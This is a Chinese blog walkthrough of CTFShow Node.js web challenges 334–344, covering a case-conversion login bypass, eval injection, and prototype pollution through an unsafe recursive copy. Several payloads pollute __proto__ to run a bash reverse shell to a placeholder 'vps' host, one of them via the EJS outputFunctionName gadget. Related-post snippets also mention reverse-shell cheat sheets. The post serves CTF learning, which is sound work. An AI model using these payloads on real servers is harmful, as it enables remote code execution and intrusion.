ctfshow nodejs系列

最新推荐文章于 2024-03-26 20:16:32 发布
最新推荐文章于 2024-03-26 20:16:32 发布
阅读量197 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58624515/article/details/130058119
版权
文章描述了一系列基于Web的安全问题,涉及JavaScript代码中的登录验证、eval函数的使用、MD5哈希比较、以及原型链污染等。通过分析和理解这些代码片段,可以找到获取flag的方法,例如在login.js中利用toUpperCase绕过特定条件,或者通过污染__proto__属性来改变对象的行为。这些问题展示了Web应用中常见的安全漏洞和攻击手段。
摘要由CSDN通过智能技术生成

web334

下载下来是一个zip,解压

login.js

var express = require('express');
var router = express.Router();
var users = require('../modules/user').items;

var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

/* GET home page. */
router.post('/', function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var sess = req.session;
  var user = findUser(req.body.username, req.body.password);

  if(user){
    req.session.regenerate(function(err) {
      if(err){
        return res.json({ret_code: 2, ret_msg: '登录失败'});        
      }

      req.session.loginUser = user.username;
      res.json({ret_code: 0, ret_msg: '登录成功',ret_flag:flag});              
    });
  }else{
    res.json({ret_code: 1, ret_msg: '账号或密码错误'});
  }  

});

module.exports = router;

user.js

module.exports = {
  items: [
    {username: 'CTFSHOW', password: '123456'}
  ]
};

user.js已经告诉我们账户名是CTFSHOW,密码是123456

分析login.js会发现

登录成功之后会json返回flag,登录的判断条件是什么呢

name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;

name不等于CTFSHOW且password等于123456

因为nodejs的toUpperCase()函数是将字符串字符转换成大写的,所以我们可以输入ctfshow,转换成大写,就可以获取到flag了

web335

ctrl+u查看源代码发现

提示eval=

我们查看nodejs的eval函数的作用

测试一下

猜测形式是eval('console.log(string)')

我们使用child_process库的spawnSync方法执行命令

上网child_process的spawnSync使用方法

我们使用执行命令

web336

跟前面一样的做法

web337

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
  
});

module.exports = router;

分析一下代码,当a和b都不是null的时候,长度相等,a和b不相等,将a+flag和b+flag分别md5的时候,他们全等,输出flag,想起了php的数组绕过,res.query是获取get传参

web338

点击下载源码

审计源代码发现

routes的login.js文件中

只要使secert.ctfshow为36dboy就可以获得flag,但是这边没有能修改secert.ctfshow的办法

但是utils.copy函数的源代码是

这段代码将object1[key] = object2[key]

如果我们这边的object1的key是__proto__

object2的key是ctfshow=36dboy

因为要json形式

这个源代码的req.body是POST传参

require("boby-parser").json()是解析json格式的

也就是application/json

所以这题的答案也就是

{"__proto__":{"ctfshow","36dboy"}}

原理

__proto__修改了Object的值,是secret.ctfshow寻找参数时,原型链里面找到他的父级的prototype

bp发送json数据包

当secret的ctfshow=="36dboy"的时候,res.end(flag)

web339

login.js核心代码

/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow===flag){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }
});

发现copy函数查看他的源码

copy源码

module.exports = {
  copy:copy
};

function copy(object1, object2){
    for (let key in object2) {
        if (key in object2 && key in object1) {
            copy(object1[key], object2[key])
        } else {
            object1[key] = object2[key]
        }
    }
  }

发现对键名和值进行了赋值

login.js的判断语句 if(secert.ctfshow===flag)

不能通过像上一题一样污染ctfshow达成条件输出flag了

看了看api.js

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  res.render('api', { query: Function(query)(query)});
   
});

当post请求api的时候,会调用render这个渲染函数,我们可以通过污染query的值,Function进行执行命令

payload:

{'username':"aa","password":"bb","__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps/443 0>&1\"')"}}

污染了query的值,

global.process.mainModule.constructor._load('child_process') 全局引用child_process库

exec('bash -c \"bash -i >& /dev/tcp/vps/443 0>&1\"') 调用child_process库的exec函数,去执行一个bash的反弹shell,将query的值改成这个

监听触发端口

将这串代码发送,我们已经污染了query的值接下来就剩下POST访问api触发

POST访问api

获取flag

web340

login.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');



/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var user = new function(){
    this.userinfo = new function(){
    this.isVIP = false;
    this.isAdmin = false;
    this.isAuthor = false;     
    };
  }
  utils.copy(user.userinfo,req.body);
  if(user.userinfo.isAdmin){
   res.end(flag);
  }else{
   return res.json({ret_code: 2, ret_msg: '登录失败'});  
  }
  
  
});

module.exports = router;

app.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');



/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  res.render('api', { query: Function(query)(query)});
   
});

module.exports = router;

发现这题还是有copy看判断条件

if(user.userinfo.isAdmin)

当isAdmin为true的时候,输出flag

但是原型链是找最近的,哪怕我们通过__proto__修改isAdmin的值,因为前面声明过this.isAdmin = false;所以不生效

为什么两次__proto__看下面的代码

payload跟上一题339差不多,只不过是需要两次__proto__才能修改Object的prototype

payload源码

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps/443 0>&1\"')"}}}

web341

跟上面一题一样的代码

没有app.js

不过我们可以ejs-rce

ejs原型链污染rce

{"username":"aa","password":"bb","__proto__":{"__proto__":{"outputFunctionName":"a; return global.process.mainModule.constructor._load('child_process').execSync('bash -c \"bash -i >& /dev/tcp/vps/port 0>&1\"')"}}}

web342-343

以后研究下jade的rce

web 344

router.get('/', function(req, res, next) {
  res.type('html');
  var flag = 'flag_here';
  if(req.url.match(/8c|2c|\,/ig)){
  	res.end('where is flag :)');
  }
  var query = JSON.parse(req.query.query);
  if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
  	res.end(flag);
  }else{
  	res.end('where is flag. :)');
  }

});

,用&代替

{"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}

把ctfshow的c编码因为"的ascii加c就是2c触发了正则

Ni_ght
关注
nodejs-nodejs
09-25
nodejs javascript demo nodejs nodejs nodejs nodejs nodejs
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6857
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
CTFSHOW-nodejs
m0_74456293的博客
04-17 567
CTFSHOW-nodejs
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
[ctfshow web入门]常用姿势807-812
weixin_45751765的博客
04-15 2952
808 811 812
【Web】CTFSHOW 常用姿势刷题记录(全)
uuzeray的博客
02-25 2011
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
nodejs14.9.0
10-30
nodejs14.9.0
learn-nodejs
最新发布
09-24
ssss
NodeJS API文档
01-16
NodeJS API文档。Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境。 Node.js 使用了一个事件驱动、非阻塞式 I/O 的模型。Node 是一个让 JavaScript 运行在服务端的开发平台,它让 JavaScript 成为与PHP、...
ctfshow—Node.js漏洞总结
cosmoslin的博客
12-27 3970
1 Js大小写绕过 ctfshow web334 下载源码 var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; }); }; 需要以账户ctfshow,密码123456登录
反弹shell的命令大全
G3et的博客
03-21 937
【代码】反弹shell的命令大全。
网络渗透实验四 CTF实践
ROM____的博客
12-14 2900
网络渗透实验四:CTF实践
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 4905
ctfshow web入门 java反序列化篇
ctfshow学习记录-web入门(命令执行39-48)
龟速更新的九某人
06-06 854
ctfshow学习记录-web入门(命令执行web39-48)
Nodejs ctf 基础
qq_61768489的博客
07-23 1778
总结数字与字符串比较时,会优先将纯数字型字符串转为数字之后再进行比较;而字符串与字符串比较时,会将字符串的第一个字符转为ASCII码之后再进行比较,因此就会出现第五行代码的这种情况;总结空数组之间比较永远为false,数组之间比较只比较数组间的第一个值,对第一个值采用前面总结的比较方法,数组与非数值型字符串比较,数组永远小于非数值型字符串;数组与数值型字符串比较,取第一个之后按前面总结的方法进行比较。应该执行eval()函数,可以执行js代码,那么就可以执行系统命令了。依旧是get传eval。...
Temple of Doom靶场&nodejs获取shell&ss-manager漏洞&tcpdump提权
jockerboss的博客
03-26 1904
Temple of Doom靶场&nodejs获取shell&ss-manager漏洞&tcpdump提权
反弹shell初识
无痕的博客
11-01 4181
反弹shell的指令与演示
无公网ip反弹shell
lq22222的博客
10-06 605
因为在kali虚拟上配置的,想要直接在kali虚拟机上面监听,所以内网主机ip地址我们这里选择127.0.0.1,端口任意大数字,我们选择54321,其他都默认,点击确定,这样我们的公网ip就配置好了。相信师傅们在打ctf靶场时都会遇到一个问题,就是部分题目需要一个有公网ip的服务器来反弹shell,但是vps很难找到免费的;这里就给大家推荐一个好用的平台————贝锐花生壳。映射类型选择TCP,映射模板选择SSH服务,然后外网域名下拉就会出现一个随机分配的域名,直接选上即可。此时再看kali终端。
CVE-2017-5941 (nodejs 代码执行)
beirry的博客
11-24 1263
vulfocus-nodejs 代码执行 (CVE-2017-5941) 复现环境 攻击机(192.168.95.58) 靶场环境(10.3.61.69) 复现过程 在含有nc文件目录下打开两个cmd,监听8888端口 nc -lvp [端口] 访问环境:http://10.3.61.69:55269 账号随意输入,密码构造payload如下 _$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp
ctfshow nodejs
08-10
你想了解关于 CTFShow Node.js 的信息吗?CTFShow 是一个 CTF(Capture The Flag)比赛平台,而 Node.js 是一种流行的 JavaScript 运行环境。你可能希望了解如何在 CTFShow 中使用 Node.js,或者有关 Node.js 的一些特定问题。请告诉我你想了解的具体内容,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值